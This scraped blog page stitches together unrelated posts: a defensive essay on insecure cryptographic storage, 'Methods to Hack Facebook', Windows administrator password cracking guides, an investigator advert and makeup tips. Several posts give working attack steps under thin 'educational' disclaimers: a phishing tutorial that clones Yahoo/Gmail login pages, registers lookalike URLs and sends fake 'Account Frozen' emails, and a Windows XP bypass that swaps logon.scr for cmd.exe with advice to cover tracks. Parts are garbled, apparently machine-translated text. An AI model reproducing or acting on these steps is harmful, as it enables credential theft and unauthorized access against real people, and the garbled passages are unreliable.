  6. Lack of support for maintenance procedures and encryption key changes.
Why web application needs to use strong cryptographic algorithms to store data?
Here, the main question arises whether the storing data in cryptographic secure manner is really important? Why we need to protect data in such a secure manner. Big organizations which deals with many secure data and information daily, know the answer. But for web masters I want to give a small example to make it clear why data security is really important.
Suppose there is an online shopping store, which is not using any type of cryptographic security to secure data before storing it into the website database. It means everything is going in database as a plain text format. As it is an online store, it will have the records of all the listed products and registered customer’s information as well. There will be password, personal contact, address and credit card information of all the customers who have an account in this online shopping website. Everything is running fine on the internet and customers can purchase anything without any problem. But, think if a hacker hacks the database of the website by any of the known or unknown method. Now he has all the information stored on the website database including records of all registered customers. This situation is harmful for both customers and the website. Hackers can use the credit card info of any of the customer for some other online purchase and they can also sell the personal data of customers to some online marketing firms. A good online shopping website generally has more than 1,00,000 customers. It means the hacker has more than 1,00,000 credit cards info. Now, He does not need to do any other work.
I think now it’s clear why data protection at the application level is important. If the website uses some highly secure cryptographic algorithms to store data, hacker will not be able to decrypt the original data even if he has the whole database of the website. In this way, he will not be able to harm customers anyway. If the website use some easy to crack algorithms such as MD5 to encrypt the data before storage, hacker will be able to decrypt the data easily. Se developer must know which data to be protect and how to protect.
Why web applications fail to protect sensitive data?
All the programming languages has inbuilt support of cryptography which allow developers to add cryptographic security in the application easily. Although programming languages give inbuilt support to cryptography, programmers still fail to protect data on web applications. There are many reasons for this vulnerability to be exists on the web applications. These are some reasons:
Developers do not know what data must be protected with the use of encryption. This is the most important reason why this vulnerability exists? Most of the web developers only care about the functionality of the web application.
Developers stored the data as plain text assuming that no one has access to the website database. But attacker got the SQL injection vulnerability in a website code and extracts the whole database information. As the information was stored as plain text, attacker has more than he wanted.
Developers do not know the proper use of some highly secure encryption algorithms. Generally they use some old and less secure algorithms such as MD5, SHA-1, RC3, RC4, etc. There are many freely available tools can easily crack these algorithms and decrypt the data in few seconds.
Developers use strong cryptographic algorithms in wrong manner. In this case attacker can analyze and break the algorithm’s security by finding security holes in the usage of the algorithms.
Everything is implemented fine but key exchange or key storage is done in wrong manner which allow attacker to get the access to key. After the disclosure of key, it is not more than a child’s play for the attacker o break the security.
How to verify data security?
In web application, developers must properly verify application that it encrypts sensitive information in storage. There are many vulnerability scanners available which scans for various types of vulnerabilities. But these scanners cannot identity cryptographic vulnerability. There are some code scanning vulnerabilities tools available which can detect the algorithm which is used to encrypt the data in the web application. But it cannot detect whether the algorithm is used properly or not. These tools cannot detect the data on which the encryption is being performed. Thus we can say that there is no automatic tool is available which can detect the insecure cryptographic storage vulnerability. So we can only detect this vulnerability only by manual methods. The best way to verify this vulnerability is Code Review. This is the best way to verify that a web application encrypts all sensitive data used in the web application and has properly implemented the mechanism and key management to encrypt the secure data. Code Review involves the process of verifying the cryptographic algorithm and its usage.
In this process, each part of the code is analyzed for insecure data storage. All the data is analyzed and marked those data which are sensitive and needs cryptographic storage. Then it checked whether the proper encryption is applied on the data within the web application. It also checked whether the encryption is easy to crack or not. If any vulnerability is found, then proper mechanism is applied to patch the vulnerability.
There are few things which must consider:
  • Ensure that web application is using cryptographic algorithms properly.
  • Ensure that password is stored in the hashed and salted.
  • Ensure that the cryptographic protection remains secure even if access controls fail.
  • Ensure that core credentials such as database credentials are securely stored.
  • Ensure all keys (Cryptographic Algorithms keys) and passwords are hardly protected from unauthorized access
  • Ensure offsite backups are encrypted. And keys used in the backup encryption are managed and backed up separately in order to provide better security.
How to prevent Insecure Cryptographic Storage?
The most important thing while using a web application is to ensure that everything which must be encrypted is actually encrypted properly. For this you must check that hat the cryptography is implemented properly on the different modules of web application. These are some ways which you can use to test and vulnerability and then patch it to protect secure data in your web application.
First of all make the website’s database as secure as possible. Check each URL for the SQL injection vulnerability. Database of the website must be secure. This is the security hole which leads to the data exposure.
If the data is sensitive, you must store it with proper use of encryption. Developers must identify the sensitive data before the development and then apply proper encryption. These are some examples of data which must be protected

  • Credit Cards numbers
  • Usernames
  • Passwords
  • User’s personal Data such as Email, phone number.

Always store hashed and salted value of the password in the database. These are hard to crack and cryptographically secure.
If website is storing any important sensitive data on the database for long period of time, it must be stored in encrypted form.
Never create new Cryptographic algorithms to use in your web application. There may be many security holes in your algorithms. So use only trusted and approved public cryptographic algorithms such as AES, RSA public key cryptography and SHA-256 or better data security. Leave this work on cryptography experts and researchers.
Avoid use of RC3, RC4, MD5 and SHA1. There are many online tools are available for free which can crack these within few seconds. Always use highly secure alternatives cryptographic algorithms, such as SHA-256 or better.
Keys are the main part of any Cryptographic algorithm. The data is secure till the key is protected. So generate Cryptographic keys offline. If you are using asymmetric key encryption in your application make sure to store private keys with extreme security and care. If there is any need of key transmission, never use any insecure channel. It may expose the key. So use HTTPS protocol in such type of secure data transmission. This must be take care.
If your web application contains modules for online payment, be sure to follow Payment Card Industry (PCI) Data Security Standard. Always protect Card Holder data and encrypt it all transmissions across all the networks either it’s public or private. In case of public network, it needs some extra care.
Never store unnecessary data on your database that may be sensitive. According to PCI standards, Websites cannot store the CVV number (the three digit number on the rear of the card) in the database under any circumstances. There are strict actions in case of failing. And there is no need to store. User will enter the CVV number each time he wants to purchase something with credit card.
Ensure that the encrypted data stored in your application is not easy to decrypt. Be sure that the algorithms used to encrypt and protect the data are hard to crack. If the algorithm used to encrypt the data is weak, then change the algorithm. This must be checked before using any encryption algorithm
Conclusion: Insecure Cryptographic Storage is a dangerous web application vulnerability which is harmful for both, website owner and website users. Most of the popular websites are vulnerable to this. Many websites developers still store passwords as a plain text in the database. Some are developers are better and use MD5 as a cryptographic algorithm to store passwords. But all these are really dangerous. There are many hacking tools available which can easily expose database of the website. In case of database exposure, attacker can easily misuse passwords stored in the plain texts.
So webmasters must have a proper guideline for the developers. They must identify the data which should be store in cryptographically secure way in the database. If the website is using password protected areas and user login. Then passwords must be encrypted hashed and slated before storing into the website database. This is the best security practice. If the website has a module for online payment, it must follow Payment Card Industry (PCI) Data Security Standards. I recommend seeing the PCI DSS Guidelines and implementing controls as necessary. After the development of the web application, it needs proper testing to check whether the website is using proper cryptographic algorithms or not. Everything must be checked properly. As a single security hole can expose the whole secret data of the web application.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Methods to Hack Facebook

Facebook is the largest social network with over 600 million users in the world.  As a consequence, more and more people ask for Facebook password hack in the Internet. So, in this article , I’m now discovering all the methods used to hack facebook password and some counter measures can also help you protect your Facebook account from hacking.

Top 4 menthos to Hack Facebook Password:

    Facebook Phishing Attack
    Hacking Facebook password by using Keylogging
    By hacking the Primary E-mail address
    Social Engineering or simply guess your password

Facebook Phishing Attack:


This is  the most easiest and the most popular method for hacking Facebook passwords.
I studied the various investigations related to actions about hacking facebook  password. The results of these investigations show “phishing” is the main method to hack facebook password,”Phishing” is a method preferred by facebook hackers. So, friends, phishing facebook Beware. Facebook staff work hard to make these crooks Facebook. Phishing, you can prevent hacking, not only on Facebook, but also virtually every e-mail account. Take Just use the trick to a phisher, which I think is very simple. I have learned without any difficulty. But remember, this is only for educational use. I will not prolong this issue here, as I have more phishing how to hack facebook password.

Hacking Facebook password by using Keylogging


This is my second favorite, the only thing you need to do is to install a remote keylogger application (if you do not have physical access to the victim’s computer).
Keylogging is easier if you have physical access to the computer victims only have to do is install a keylogger and send it to your aim, so it sends all the recorded keystrokes intended focus. What is a keylogger does is it stores keystrokes in a log file and then can these logs to get the required password and Facebook can not hack facebook password. I gave detailed information about keylogger higher in the trade for more information, see my password hacking software section

By hacking the Primary E-mail address:


If a Facebook hacker or any special Keylogger, by any means, hacks your primary Gmail or Yahoo account which you are using as the primary e-mail address, then the hacker can easily hack your Facebook password by using  “forgot  Facebook password” trich. It is simple for Hackers asks Facebook to send  password to the primary email address and ask Facebook administrator to send the reset  e-mail to your primary e-mail address which is already hacked. So your Facebook password will be reset and also will be hacked!

So do not forget to try to protect your primary e-mail address and try to keep unknown e-mail or useless e-mail  ID as your primary email address.

Social Engineering or simply guess your password:

This method seems not enough work at first. Even me, I neglected Sun But when I’m using it against my friend on Facebook and I am his Facebook password very easily with this method. I think many of you know, win what social engineering, for beginners, the social engineering method of recovery password or answer to the question of safety with just the victim. You must be very careful with that victims are not aware of your intention. Ask him carefully with your logic.


Here is some common passwords you can try to guess your password:
1. Your mobile number or your girlfriend or boyfriend  mobile number.
2. Your girlfriend or boyfriend names.
3. Date of Birth
4. Your favorite movie names, the names of the cartoon character or favorite band name or names only heroes like Batman, The Dark Knight, Superman, Godzilla, Spartacus, and more ..
5. The main need now, most will forget to ask local alphanumeric now that the user only 1,2,3 smarter in their passwords and some normal guys have added to their passwords !,@,# and surprisingly all right.

So far I have found these Fackbook password hacking methods. I never encourage hacking Facebook or other e-mail account, I just want you aware of online dangers Facebook. I will apprecial you  if you mention any other methods  to Hack Facebook password.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Top 3 Options to Crack Windows Administrator Password

Why feel so helplessness when lost or forgot windows administrator password? How to Crack Windows Administrator password is a hot topic that spreads among the common computer users. If you’re looking for cracking Windows password as you have forgotten the windows password, read the reset of this article and find out how you can bypass Windows Admin password.

Options 1: Crack Windows XP administrator password

If you log into a limited account on you target computer, then follow the steps below to crack Windows XP administrator password.

    Open you command prompt.
    Type the command below:
        net user password

        cd\
        cd\ windows\system32
        mkdir hacktemp>
        copy logon.scr hacktemp\logon.scr
        copy cmd.exe hacktemp\cmd.exe
        del logon.scr
        rename cmd.exe logon.scr
        exit

    Now basically you have told the windows to backup the command program and the screen saver file, then edited the settings so when the windows loads the screen saver, you will get an unprotected dos prompt without logging into XP.
    Once this happens, enter this command:

If the admin account is called Michelle and you want to reset the password as pass, then enter this:

    net user Michelle pass

Now your administrator account password of Michelle is pass, just using the hacked Windows XP administrator password to reboot your machine and do whatever you want to do.

PS: Don’t forget to copy the contents of hacktemp back into the C:\windows\system32 directory to cover your tracks

Option 2
: Hack Windows administrator password form Safe Mode

    Reboot your computer and go to Safe Mode by pressing F8 button before the Windows boot screen appears.

Note: If you are using Windows NT/9X,press F5 instead.

    Select Safe Mode on the screen and then press Enter.
    Your computer will start in Safe Mode.
    Find the icon for Administrator account. If you didn’t change the default settings of your system, the administrator account should no password protected.
    Login as admin, press YES at the prompt asking if you would like to continue using Safe Mode.
    Continue go to start and then click on the control panel. Here you can change any of user account passwords.
    Reboot your computer and then login with the new hacked windows administrator password.

Options 3:
  Hack or Crack Windows Administrator Password using Windows Password Cracker software

You need prepare a few things:

        A good computer
        A reliable cable or DSL connection
        A blank CD/DVD or USB flash drive
        A Windows Password Cracker software

After you’ve download the setup file of the software, you will need to Create a password reset CD/DVD or USB flash drive that will enable you to get past your current Windows password. To create this disk you need to:

1. Install the utility on the computer that you’re just using.

2. Take the CD/DVD or USB drive and insert it on an open port on your computer.

3. Run the utility and select the option to burn the utility to the CD/DVD or USB drive.

If you have change the build-in administrator password and now forgot it, you will be unable to hack forgotten windows password by option 1 and option 2. Then option 3 is your best choice to bypass the locked out computer, it is the most effective windows password hacking method on the market. Don’t take my word for it, why don’t you have a look for this utility and try to crack windows administrator password by yourself, Visit: Software to crack Windows Administrator password.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Crack Windows 7 Password with 3 Password Crackers

How to crack Windows 7 password when you forgot password? Creating a password for Windows 7 can be rather simple, but forgetting Windows 7 password will be frustrating and bring you lots of troubles. Here are some top Windows 7 password crackers for lost or forgotten Windows 7 password hacking problems.

Crack windows 7 password with Windows Password Breaker

Windows Password Breaker is the most popular commercial Windows password reset tool. It allows you to burn a bootable password reset CD/DVD/USB flash driver to reset forgotten Windows administrator and other user account on Windows 7 under DOS. Compared with other similar applications, this software is better in compatibility and reliability with a smaller file size. It can hack Windows 7 password faster than other Windows password cracker tool without any damage to your computer data and settings and its password recovery rate is 100% guaranteed.

How to hack Windows 7 password with Windows Password Breaker? It takes you less than 5 minutes in 5 steps as follows:

Step 1. Download and install Windows Password Breaker.

Step 2. Burn a bootable password reset CD/DVD/USB drive.

Step 3. Boot your locked computer form the CD/DVD/USB.

Step 4. Remove Windows 7 password under DOS.

Step 5.Log on computer without password.

Windows 7 password cracker: Windows Password Unlocker


Windows Password Unlocker is efficient Windows 7 password recovery software available for you. Similar to Windows Password Breaker, it is allows you to burn a bootable password reset CD/DVD/USB flash drive to instantly crack Windows 7 password. But what is different is that this program enables you to reset password under Win PE instead of DOS. It comes with intuitive GUI interface and allows you to complete password hack within a few clicks. So this application is especially favored by those who have little computer knowledge. Of course, its password recovery rate is also 100% guaranteed.

Crack Windows 7 password with Ophcrack


Ophcrack is a free Windows password cracker that cracks Windows 7 passwords by using LM hashes through rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms. Please note that passwords greater than 14 characters cannot be cracked.

Step 1. Download LiveCD version of Ophcrack for Windows 7

Step 2. Burn the downloaded ISO file to CD.

Step 3. Insert the CD in your locked computer and rebooting the computer.

Step 4. When the computer is booting you will need to press the correct key to get you into the Boot Menu. It is usually F10 or Delete.

Step 5. Once in the boot menu select the disk drive that the CD is in. Now follow the on screen directions. After it gets to the menu press the "Crack" button to crack Windows 7 password.

If you are not good at computer, it is not advised to try this to crack your Windows 7 password.

When you happened to forgot Windows 7 password, you can choose one password cracker above for your Windows 7 password hack.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Is My Email Account Hacked?

           In this day and time, all too often people on the Internet are getting their email accounts hacked into. This is an act that can cause a very frightening situation. For many people it is the one privacy they thought they had and it is now totally violated. Just imagine the feelings it would cause you to have if you learned a hacker has invaded your email account and have been reading through all of your sent and received email messages. Not only is this a tremendous invasion of a person's privacy, but the situation can become even more serious when they have inadvertently left personal information about themselves in emails that they were saving. There are even some people that save emails containing private passwords to several accounts that they have online. Just imagine the unbelievable amount of problems that this can cause when your email account is hacked.

Of course the first thing that most people do when they realize that someone has hacked into their email account, is they immediately begin changing all of their passwords.
Although this is important it is very important to go a step further than this. Consulting with an expert private investigator that knows how to perform a hacked email account investigation is a move that can help you regain your sense of privacy and security that is so important while browsing the world online. It is also probably the only way you will ever be able to locate and identify the person who violated your privacy.

identifying the hacker is essential to your well being if you ever expect to trust the people closest to you. after all it could be an ex-husband or jealous boyfriend that is reading your private messages.

Performing a hacked email account investigation is a process that only requires your email address.
After supplying the investigator with this information, they can then attempt to locate the hacker and identify who has been reading through your emails. Regardless of who it is that has hacked into your email account, expert private investigators have the knowledge and skill required to gain information about any other computer a hacker is using to access to your email.

Once the hacked email account investigation has been completed, you will be provided with detailed information regarding the ISP or Internet service provider that the hacker is using, their full name, their telephone number, street address and their email address. After gaining this informative information it can be turned into the local authorities that can put an end to the hacker's activities completely.

If you believe that your email account has been hacked, regardless of the type of email account you have, a hacked email account investigation is the perfect answer.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Trick To Hack Email ID And Password


Here I provide you the procedure you need to follow to hack a Gmail ID.

1.At first you need to open the website of the email id hoster(say gmail,yahoomail,hotmail etc. For eg. If the email ID is username@gmail.com you need to open www.gmail.com)


2.After opening the hoster website click inside the website once and press 'CTRL+U', you will be provided with a popup window from your browser in which the source code of the gmail website exists.


3.Copy the source code from the pop u window.(you can use 'CTRL+A" to select the code and 'CTRL+C' to copy it).


4.Open NOTEPAD and paste the source code you copied from the popup window.
5.Save it as goharshhackers.html.
6.Now in the file you saved find a code line starting from (this is the code which is related to yahoo,for other sites find code starting with and having string as (form method="post" action="xxxxxxxxxxxxx"))
7.Replace the (form method="post" action="xxxxxxxxxxxxx") code by the the following code after placing your form id:

Now save the goharshhackers.html file again.


Procedure:
Here I provide you the procedure you need to follow to 'hack a gmail ID':
1.At first you need to open the website of the email id hoster(say gmail,yahoomail,hotmail etc.For eg. If the email ID is username@gmail.com you need to open www.gmail.com)

2.After opening the hoster website click inside the website once and press 'CTRL+U', you will be provided with a popup window from your browser in which the source code of the gmail website exists.

3.Copy the source code from the pop u window.(you can use 'CTRL+A" to select the code and 'CTRL+C' to copy it).

4.Open NOTEPAD and paste the source code you copied from the popup window.

5.Save it as goharshdotcom.html.

6.Now in the file you saved, find a code line starting from
action="https://login.yahoo.com/config/login?" autocomplete="off" name="login_form"> (this is the code is related to yahoo,for other sites find code starting with and having string as (form method="post" action="xxxxxxxxxxxxx"))
7.Replace the (form method="post" action="xxxxxxxxxxxxx") code by the the following code after placing your Form ID:
Your Form ID Here" method="post" enctype="application/x-www-form-urlencoded" onsubmit="return New_Form_CF();">
8.Now save the goharshdotcom.html file again.


This finishes your preparation.
Now follow this
If you want to hack a victim's user-name and password,the Victim has to login to his/her account through the page embedded with the code you saved.(I will explain the trick on how to make someone login from your page in the last paragraph of this article)

To create a web page, to make them login from your page You need to upload your saved goharshdotcom.html to a free hosting website (you can read our 'Guidelines to create a website for free' article to know how to create a website for free and the list of guinine free website hosters).
Now select your site name as yourmail.yahooo.com/support or email.yahoo.com/support or some other format from which the victim can be convinced to visit for login.

You can add lots of unrelated letters in the URL(for example mail.yahoo.com/support/EhnTuhdEWsh_SECURELOGIN or you can even impress the victim if he/she donot have much knowledge about internet by a simple url like www.GmailloginSECURELOGIN.webs.com -which you can obtain for free) as mail.yahoo.com/support URL will no longer available for registering.You can also add some rubbish numbers and make is very long so that the victim wont see the name of webhost in the link you provide.

Create a fake mail like support_yahoo@yahoo.com (like Support.googleforyou@gmail.com etc if victim's id is of gmail) and send a mail to the victim to his email id stating "Account Frozen" and in the mail write "Due to some technical errors in yahoo we need you to login through this link otherwise your account will be frozen".

After reading this the victim clicks on the link and enter his ID and password. but as soon as this happens, as you have given the redirecting URL as the URL of the site itself it will go to the login page again after he click submit.The victim will think that he might have entered a wrong password so that the page reloaded again(As it usually happens while we login through any other website)but in reallity the username and password will been sent to your email account you specified and the victim will still not knowing that his account has been hacked.

Warning :
"This Hacking trick is just to make you aware of Phishing. And it is just a small contribution from us to make our Readers aware of these things. Please do not use this trick to get someone's personal data,Which is illegal. Using this just to fool your friends is left to you and your friend but if you get caught We do not bear any responsibility.If you find anybody adopting this trick to steal your data, Contact me for the solution."

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How To Apply Mascara

Mascara gives a finishing touch to your eye makeup and must cover the lashes from roots to the tips. Deposit the color on the mascara wand by twirling it in the pack and then cover the upper lashes from their base to the tips in full strokes to make the lashes look thicker, longer, well defined and separated. Mascara is applied from the underside by holding the wand horizontally parallel to the eyelid and the brush is rolled slowly in the upward stroke. For lower lashes, one has to be more careful so as not to smudge the under eye area and the wand is to be held vertically and mascara is applied from side to side. Less mascara is used on the lower lashes and extra color should be blotted off using the tissue paper. Usually women opt for more than one coat of the mascara, which combs the lashes too so that they do not look stuck together.

If mascara is deposited on the wand more than needed, tissue the extra color off before applying it.
Different colors of mascara such as brown, navy and green can make you look funky instantly. It is important that mascara is used on an individual only to avoid transferring eye infections and if it causes even the slightest irritation in the eye, it must be immediately discarded. Wiggle the brush a little at the roots of the lashes as it allows the bristles to move between the eyelashes, combing them and separating them. Let mascara dry between any of the two coats and comb the eyelashes to separate the wet lashes. Do not rub eyes to remove the mascara but use the eye makeup solvent instead. Before applying mascara, use an eyelash comb or damp toothbrush to comb your lashes. Always use a clean and fresh mascara wand on damp lashes.


Black mascara can be used by anybody at anytime
though blondes should only use it for bright night makeup. Thin and short brush is best as it is easier to control and gets to the corner of the eye easily. It is also advisable to powder the under-eye area before applying mascara to avoid smudging. Curl the lashes before applying mascara by moving the wand in a zigzag fashion to make the lashes look wider and brighter. Applying mascara only on the upper lashes lend them a dramatic touch, while applying it lightly on the upper and lower lashes, make the eyes seem wider. A gel-based mascara enhances the lashes while thickening mascara looks more dramatic and adds volume to your lashes. Brown, navy and aubergine shades add subtle and sophisticated touch to your eyes while redheads can use burgundy shades. Women with strawberry-blonde hair may try different shades of brown. Be sure not to match your mascara color with your eye color.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Party Makeup




  1. Everybody in this world wants to look beautiful. This desire becomes more prominent especially if there is some special occasion or party. Researches say that a nice make up boosts up the confidence of a person in the social arena. So, not only on physical level, the art of make up has it charm on psychological level also. Apart from this, who does not love being the center of attention in a party? In case you are scheduled to attend some party recently, go through this article to discover some handy tips on part makeup.

    How is Party Makeup different from Regular Makeup?

    Party Makeup is very different from the makeup we apply on a regular basis. As most of the parties are scheduled on evening or night time, the party make up is obviously more glittery and shining than the regular make up. It is also comparatively darker and dazzling than the regular makeup. Apart from the clean, clear and attractive look, the party makeup aspires to provide a poised and jaw drop gorgeous look.

    Before you choose a Party Makeup

    It is very important for you to keep certain points in mind before you go for a party make up.
  2. Go for a makeup that suits the mood of the party.
  3. Choose the makeup complementing your skin tone.
  4. Try to look gorgeous without experimenting much with your comfort level.
  5. Go with a makeup that suits your persona.
  6. If you are planning to do something new, go for a trial first to avoid any haphazard at the last moment.
  7. Try doing something different from what is in extreme fashion to avoid being a commoner.
  8. Feel confident of whatever you get done with yourself and carry it well.
  9. Tips for Party Makeup
  10. Go for proper cleansing, exfoliating, toning and moisturizing before anything else.
  11. Apply ice all over your face.
  12. Now thoroughly apply concealer in order to hide the scars and imperfections on your face.
  13. You should then apply light base and foundation on your face and neck to make your skin smooth and even. This also helps to avoid sweating which can spoil your makeup.
  14. You should now apply a highlighted oil-free moisturizer mixed with shining products such as shimmer dust to provide extra shine to your face. Remember to set loose powder by even brushing on the face and neck.
  15. You can experiment with eye makeup according to party wear you are planning to wear. However, Smokey eyes are always a good option for a sexy and sensual look in parties.
  16. Choose your lipstick in accordance with your dress. However go for darker shades if it is a night party.
  17. Golden, bronze and silver liners add to your freshness and glamour. So prefer using them.
  18. In case the party is a little formal or a day time party, go for a little lighter make up and less shimmering dresses

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS